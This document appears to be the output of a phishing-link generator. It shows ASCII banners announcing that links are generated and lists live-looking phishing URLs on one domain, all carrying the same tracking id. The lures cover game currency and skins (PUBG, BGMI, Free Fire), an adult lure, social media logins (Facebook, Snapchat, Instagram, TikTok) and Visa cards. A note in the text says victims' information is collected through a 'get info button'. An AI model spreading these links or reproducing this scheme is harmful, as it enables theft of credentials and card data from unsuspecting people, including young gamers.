hello world...

_     _       _
| |   (_)_ __ | | _____    __ _ _ __ ___
| |   | | '_ \| |/ / __|  / _` | '__/ _ \
| |___| | | | |   <\__ \ | (_| | | |  __/
|_____|_|_| |_|_|\_\___/  \__,_|_|  \___|

  ____                           _           _
 / ___| ___ _ __   ___ _ __ __ _| |_ ___  __| |
| |  _ / _ \ '_ \ / _ \ '__/ _` | __/ _ \/ _` |
| |_| |  __/ | | |  __/ | | (_| | ||  __/ (_| |
 \____|\___|_| |_|\___|_|  \__,_|\__\___|\__,_|

whenever you gather someone else's  information...
of victim it would be saved to the get info button...


Phishing Links :
~ Created Successfully 
~ Reception : "get_info button"  

• PUBG MOBILE 
~ Skin ⊱ https://playgifts.es/BI.php?nox=5626257080

~ UC ⊱ https://playgifts.es/MD?nox=5626257080

• BGMI 
~ BV1 ⊱ https://playgifts.es/BG?nox=5626257080

~ BV2 ⊱ https://playgifts.es/PI?nox=5626257080

• FOOT BALL 
~ PS1 ⊱ https://playgifts.es/KO?nox=5626257080

• FreeFire 
~ EV1 ⊱ https://playgifts.es/FR?nox=5626257080

• SEX +18 
~ XV1 ⊱ https://playgifts.es/SX?nox=5626257080

• facebook 
~ FV1 ⊱ https://playgifts.es/FC?nox=5626257080

• SnapChat 
~ SV1 ⊱ https://playgifts.es/SN?nox=5626257080

• Instagram 
~ GV1 ⊱ https://playgifts.es/IN?nox=5626257080

• tiktok 
~ TV1 ⊱ https://playgifts.es/TK?nox=5626257080

• Visa Card 
~ VS1 ⊱ https://playgifts.es/VI?nox=5626257080

~ VS2 ⊱ https://playgifts.es/VC?nox=5626257080